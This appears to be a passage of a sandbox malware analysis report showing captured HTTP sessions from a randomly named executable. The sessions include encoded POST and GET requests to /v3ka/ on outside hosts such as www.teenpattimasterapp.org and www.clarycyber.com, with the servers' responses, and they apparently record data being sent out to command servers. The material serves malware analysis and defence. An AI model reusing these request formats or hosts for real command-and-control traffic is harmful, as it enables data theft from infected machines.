38 6d 68 48 46 6f 43 66 49 2b 65 6b 74 74 52 31 64 41 7a 32 2b 4d 4f 46 71 5a 43 46 32 63 50 32 4f 30 47 72 38 47 62 2b 45 7a 6d 61 77 68 62 4c 46 41 44 52 45 68 7a 53 58 4c 72 58 4d 44 44 37 51 49 2f 6d 71 5a 2f 5a 70 55 76 62 38 53 48 78 68 73 4f 34 41 6f 38 6f 69 57 59 69 50 38 55 66 48 33 7a 5a 62 4f 74 6d 70 4d 63 5a 76 6f 4e 33 76 4e 37 45 69 6e 7a 43 30 57 46 4d 63 73 4c 41 6e 4d 45 4a 77 32 48 6e 67 30 42 69 47 48 43 57 68 6b 74 2b 5a 33 78 66 6e 35 46 57 50 33 4d 6a 2b 53 69 49 38 6e 59 46 57 4d 62 78 39 52 4c 39 77 59 44 76 31 79 41 4d 65 59 50 76 4c 6d 7a 36 61 51 46 31 57 39 5a 7a 4f 7a 2b 6d 44 36 4e 78 65 2f 36 6c 44 57 68 75 79 67 57 6d 69 64 49 4b 6b 4b 63 46 6e 6a 50 75 48 48 45 39 31 6b 2b 68 42 58 77 43 63 39 69 32 6b 3d Data Ascii: nf8dPP8p=hgTlIlyCji2xH0amRFLQI/ZyzqCi6fkYPoHe1xCPFlwPQu1DR94ETpHIGYNORGaexaqReJU3c3skaaa5z7gFoETdUKbhhPyXRB7nGrF08AgjATaXPQQK2LnjBNepKpZLS5sJhR/kwx+LJLTklXnZrIC5ekGGIb8QgRvcPkbC+FT0xUHA0vKCesmOFbJb6nsA7fCizsQqox/pBpBCyuIsqnImV6b8LugmjUyouKSa0CfNAptlTTDWgJflBYrT01JtDNnj6QFLc9T1Fnvhecn7gum5dtL2IQ8mhHFoCfI+ekttR1dAz2+MOFqZCF2cP2O0Gr8Gb+EzmawhbLFADREhzSXLrXMDD7QI/mqZ/ZpUvb8SHxhsO4Ao8oiWYiP8UfH3zZbOtmpMcZvoN3vN7EinzC0WFMcsLAnMEJw2Hng0BiGHCWhkt+Z3xfn5FWP3Mj+SiI8nYFWMbx9RL9wYDv1yAMeYPvLmz6aQF1W9ZzOz+mD6Nxe/6lDWhuygWmidIKkKcFnjPuHHE91k+hBXwCc9i2k=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	50250	84.32.84.32	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:26.784461975 CET	1286	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.teenpattimasterapp.org Origin: http://www.teenpattimasterapp.org Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.teenpattimasterapp.org/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 68 67 54 6c 49 6c 79 43 6a 69 32 78 48 30 61 6d 52 46 4c 51 49 2f 5a 79 7a 71 43 69 36 66 6b 59 50 6f 48 65 31 78 43 50 46 6c 34 50 4d 4d 39 44 51 63 34 45 53 70 48 49 46 59 4e 50 52 47 61 35 78 61 53 4e 65 4a 59 6e 63 78 67 6b 61 74 65 35 7a 49 59 46 34 30 54 65 4e 36 62 76 77 66 79 35 52 42 2f 7a 47 72 52 4f 38 77 55 6a 47 6a 71 58 65 78 51 56 2b 37 6e 68 42 4e 65 6c 59 5a 59 34 53 34 59 6e 68 52 7a 6b 77 79 4b 4c 50 39 58 6b 6e 67 7a 5a 7a 49 43 32 56 45 47 46 53 72 38 54 67 51 4c 69 50 6b 62 53 2b 45 48 30 78 54 37 41 31 75 4b 42 65 4d 6d 4f 47 62 4a 59 2b 6e 67 45 37 65 71 78 7a 74 6b 71 6f 7a 2f 70 41 4a 42 43 35 76 49 6a 2b 58 49 61 52 36 62 6e 64 65 73 55 6a 55 6d 38 75 50 53 61 33 79 4c 4e 53 71 31 6c 56 32 76 57 69 70 66 37 50 34 72 45 76 6c 4a 48 44 4e 32 49 36 51 6c 62 63 2f 66 31 44 32 50 68 49 64 6e 36 32 65 6d 2f 44 39 4c 6e 5a 41 77 79 68 48 56 30 43 66 4a 37 65 6c 5a 74 52 46 74 41 68 33 2b 50 50 31 71 65 4e 6c 33 65 47 57 79 2b 47 72 67 65 62 2b 38 6a 6d 64 6f 68 55 4c 46 41 4a 57 6f 6d 6d 53 57 44 30 48 4d 52 63 72 52 53 2f 6d 6d 37 2f 62 46 69 6f 74 49 53 56 78 78 73 4b 6f 41 70 33 59 69 4e 52 43 50 2b 51 66 48 33 7a 5a 58 77 74 6a 78 4d 63 70 48 6f 4d 45 48 4e 2f 58 61 6e 67 79 30 51 46 4d 64 77 4c 41 69 73 45 4a 34 4d 48 6d 77 65 42 67 4b 48 43 6a 46 6b 75 36 31 32 6e 66 6e 47 53 47 50 37 47 44 79 4a 69 49 67 76 59 47 2b 32 62 44 70 52 4b 39 41 59 55 2f 31 7a 53 38 65 43 49 76 4b 2b 33 36 58 50 46 31 62 41 5a 32 7a 72 2b 6b 7a 36 63 6c 33 6c 6e 57 76 54 37 4d 69 37 55 43 69 77 65 61 73 75 66 6a 43 47 4b 39 76 36 63 5a 55 32 78 51 74 44 6f 53 41 6d 35 77 4c 35 62 34 76 6b 74 30 4a 65 4a 76 72 4e 48 38 72 6a 48 63 63 43 6f 71 63 39 45 74 5a 6e 49 55 55 6b 39 49 69 51 64 48 73 6a 31 70 54 70 67 6a 4c 35 2b 38 76 45 57 49 38 47 68 32 37 75 41 55 33 41 6f 32 77 53 58 6a 75 6b 50 51 69 61 61 7a 74 67 30 61 74 63 70 5a 50 64 54 78 31 48 45 77 49 69 41 76 59 79 57 49 45 74 54 68 59 73 77 49 2b 46 79 74 66 54 4c 38 4d 47 4f 73 62 4a 53 6a 76 6f 45 50 31 39 6a 45 6c 50 51 58 4e 64 43 69 6c 64 79 37 61 70 66 75 32 34 33 57 67 4f 41 52 30 6b 48 54 33 39 64 50 49 48 55 5a 6c 51 68 45 37 62 44 56 7a 7a 76 77 4b 74 4a 71 57 68 61 35 Data Ascii: nf8dPP8p=hgTlIlyCji2xH0amRFLQI/ZyzqCi6fkYPoHe1xCPFl4PMM9DQc4ESpHIFYNPRGa5xaSNeJYncxgkate5zIYF40TeN6bvwfy5RB/zGrRO8wUjGjqXexQV+7nhBNelYZY4S4YnhRzkwyKLP9XkngzZzIC2VEGFSr8TgQLiPkbS+EH0xT7A1uKBeMmOGbJY+ngE7eqxztkqoz/pAJBC5vIj+XIaR6bndesUjUm8uPSa3yLNSq1lV2vWipf7P4rEvlJHDN2I6Qlbc/f1D2PhIdn62em/D9LnZAwyhHV0CfJ7elZtRFtAh3+PP1qeNl3eGWy+Grgeb+8jmdohULFAJWommSWD0HMRcrRS/mm7/bFiotISVxxsKoAp3YiNRCP+QfH3zZXwtjxMcpHoMEHN/Xangy0QFMdwLAisEJ4MHmweBgKHCjFku612nfnGSGP7GDyJiIgvYG+2bDpRK9AYU/1zS8eCIvK+36XPF1bAZ2zr+kz6cl3lnWvT7Mi7UCiweasufjCGK9v6cZU2xQtDoSAm5wL5b4vkt0JeJvrNH8rjHccCoqc9EtZnIUUk9IiQdHsj1pTpgjL5+8vEWI8Gh27uAU3Ao2wSXjukPQiaaztg0atcpZPdTx1HEwIiAvYyWIEtThYswI+FytfTL8MGOsbJSjvoEP19jElPQXNdCildy7apfu243WgOAR0kHT39dPIHUZlQhE7bDVzzvwKtJqWha5
Feb 28, 2024 15:46:26.784509897 CET	1286	OUT	Data Raw: 73 32 4f 45 39 4f 50 74 52 36 35 2b 4a 6c 6a 47 6c 41 39 2b 34 32 52 36 75 64 79 4a 61 47 43 6a 59 33 7a 54 4f 56 5a 58 2f 38 6e 51 65 6e 62 38 6e 58 44 71 61 5a 34 4a 6c 78 44 52 66 45 50 37 63 32 59 4f 57 4c 69 2f 50 71 4c 5a 55 66 65 63 67 78 Data Ascii: s2OE9OPtR65+JljGlA9+42R6udyJaGCjY3zTOVZX/8nQenb8nXDqaZ4JlxDRfEP7c2YOWLi/PqLZUfecgxjioE4g4Gp+Z0JY9f+Omtq0D4zRn/mtDQ9S2RAe3U3Bm+5Eif5meaK12JkNXHoS3AvIhAkrVt01A6uiM1YSpuDXzOQvQgGC8Hoj0U4MBDLZdpiYJMsrCCteZB9io002h1AvxGG9nD33WgQol9ubBu3h8A0m7loWKq2
Feb 28, 2024 15:46:26.784564018 CET	10288	OUT	Data Raw: 47 43 42 54 53 49 49 4e 69 61 7a 71 70 6b 50 70 69 33 38 43 74 4c 4f 38 4e 58 67 44 56 54 65 70 41 32 4c 53 53 4c 70 47 36 59 36 32 59 52 2f 36 74 63 6f 53 6e 63 56 74 35 2b 45 64 33 51 43 77 4c 47 46 77 63 72 34 2b 66 50 74 49 50 47 58 32 55 65 Data Ascii: GCBTSIINiazqpkPpi38CtLO8NXgDVTepA2LSSLpG6Y62YR/6tcoSncVt5+Ed3QCwLGFwcr4+fPtIPGX2UenLNZ1Nryo+jakhLo8shpP9QZ3zE4tJBsLWTx3k83PJLw1lqeslPMyLHRg1/BzXjvPXyQdUBoZ63Tdi5tlqsGvqjfbQ9swM1sFBLGWineHSnoYprxab9gFFztpO08a2tBgbkswuE5IqDR+HcXfNTDChRUbdp8+iSWC
Feb 28, 2024 15:46:27.113357067 CET	1286	OUT	Data Raw: 56 48 36 5a 67 68 56 36 37 50 34 6f 59 77 49 47 31 44 31 47 64 61 6e 33 68 61 57 68 56 59 45 63 38 78 74 77 71 2b 33 2b 6b 35 45 73 77 31 73 4a 56 33 72 65 34 42 47 56 52 61 46 68 78 33 51 2f 2f 65 5a 5a 5a 57 62 65 73 37 4a 49 53 4a 43 48 43 59 Data Ascii: VH6ZghV67P4oYwIG1D1Gdan3haWhVYEc8xtwq+3+k5Esw1sJV3re4BGVRaFhx3Q//eZZZWbes7JISJCHCYNGnswYfzyqRyZPuqnzCNBXRk2KjGPmqEPxMQUWN1yJiflfZikQfmysIMxYRiRcf8SCdUVJqmxPehfSDIc7bH1lh3mrFP1HVgJp4mHgXVz6y47vrY5XT8UO+JMj41MRR43yFrVXMCHiN5P/2Tt6+XPrwALr3Ba7PNJ
Feb 28, 2024 15:46:27.113540888 CET	3858	OUT	Data Raw: 4b 63 68 35 4b 67 50 6f 75 45 75 72 76 46 68 32 30 56 74 73 36 38 53 39 42 48 6a 4e 52 47 54 34 78 32 41 64 36 75 30 65 68 49 6a 58 76 4c 37 56 4c 2f 4e 48 30 43 72 6d 6f 44 63 66 49 6b 44 57 68 4e 44 41 2b 5a 38 75 5a 48 37 4e 58 6f 4f 4d 7a 6b Data Ascii: Kch5KgPouEurvFh20Vts68S9BHjNRGT4x2Ad6u0ehIjXvL7VL/NH0CrmoDcfIkDWhNDA+Z8uZH7NXoOMzkOdfi8hj37JQjkdYPSNy/JQqC49o0ptctYS0WZEwWPlJ1+Uj8gTpoaV0AQLj3UseULXLZ5y6y4SKyFnacgSN0LLiSVkJADWj0XhVnVhQJUb1flt8pCsNSBAWv1bnqhGzwFeVLNQyl8H9clgmnCEhX3WJe2OHJJoBrR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	50251	84.32.84.32	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:29.642379045 CET	471	OUT	GET /v3ka/?nf8dPP8p=si7FLVHJ8iWuYVaJX0viNMh14aSy8OUSJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfJJOmXY/Qje/FgRXyNk=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.teenpattimasterapp.org Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:46:29.979629040 CET	1286	IN	HTTP/1.1 200 OK Server: hcdn Date: Wed, 28 Feb 2024 14:46:29 GMT Content-Type: text/html Content-Length: 10066 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 22814a9c280de5de219e8b4a0797bbd0-asc-edge2 Expires: Wed, 28 Feb 2024 14:46:28 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding
Feb 28, 2024 15:46:29.979737043 CET	1286	IN	Data Raw: 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 Data Ascii: :0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weigh
Feb 28, 2024 15:46:29.979809999 CET	1286	IN	Data Raw: 72 3a 23 63 64 63 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 Data Ascii: r:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:2
Feb 28, 2024 15:46:29.979866982 CET	1286	IN	Data Raw: 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d Data Ascii: ge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.mess
Feb 28, 2024 15:46:29.979921103 CET	1286	IN	Data Raw: 67 65 72 2e 63 6f 6d 2f 74 75 74 6f 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c Data Ascii: ger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href
Feb 28, 2024 15:46:29.979974031 CET	1286	IN	Data Raw: 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e Data Ascii: y website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-ti
Feb 28, 2024 15:46:29.980027914 CET	1286	IN	Data Raw: 66 6f 72 28 76 61 72 20 72 2c 65 3d 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 Data Ascii: for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023\|55296)),r=56320\|1023&r),e.push(String.fromCharCode(r))}retu
Feb 28, 2024 15:46:29.980081081 CET	1286	IN	Data Raw: 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 Data Ascii: 1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var
Feb 28, 2024 15:46:29.980127096 CET	118	IN	Data Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 Data Ascii: .location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	50252	62.149.128.45	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:35.925522089 CET	730	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.clarycyber.com Origin: http://www.clarycyber.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.clarycyber.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 45 36 6f 54 67 70 65 6f 65 6b 51 43 4b 55 78 62 39 36 34 58 58 6f 58 4c 51 6d 61 35 46 72 61 75 38 74 5a 47 36 57 2f 55 72 63 63 6b 74 6b 76 6a 6e 6a 61 54 61 6e 31 58 77 61 4b 6b 78 31 4a 54 36 74 53 35 36 47 31 56 78 58 54 31 34 30 57 48 71 4d 57 66 44 48 51 54 46 44 56 66 39 68 78 30 6e 47 71 54 34 30 32 53 36 74 35 4a 6e 2b 62 6a 71 78 32 70 6e 4a 51 72 57 76 6e 72 4b 71 50 69 4c 58 76 79 4d 42 69 32 49 72 69 67 49 63 36 73 41 62 30 33 2f 35 74 4a 36 4b 2b 57 51 69 38 55 4d 49 33 57 58 4d 66 43 6f 6a 4d 53 78 58 4b 50 35 4f 35 75 30 37 76 62 44 46 46 70 51 42 67 42 43 67 3d 3d Data Ascii: nf8dPP8p=E6oTgpeoekQCKUxb964XXoXLQma5Frau8tZG6W/UrccktkvjnjaTan1XwaKkx1JT6tS56G1VxXT140WHqMWfDHQTFDVf9hx0nGqT402S6t5Jn+bjqx2pnJQrWvnrKqPiLXvyMBi2IrigIc6sAb03/5tJ6K+WQi8UMI3WXMfCojMSxXKP5O5u07vbDFFpQBgBCg==
Feb 28, 2024 15:46:36.247968912 CET	1286	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 28 Feb 2024 14:46:36 GMT Connection: close Content-Length: 4953 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 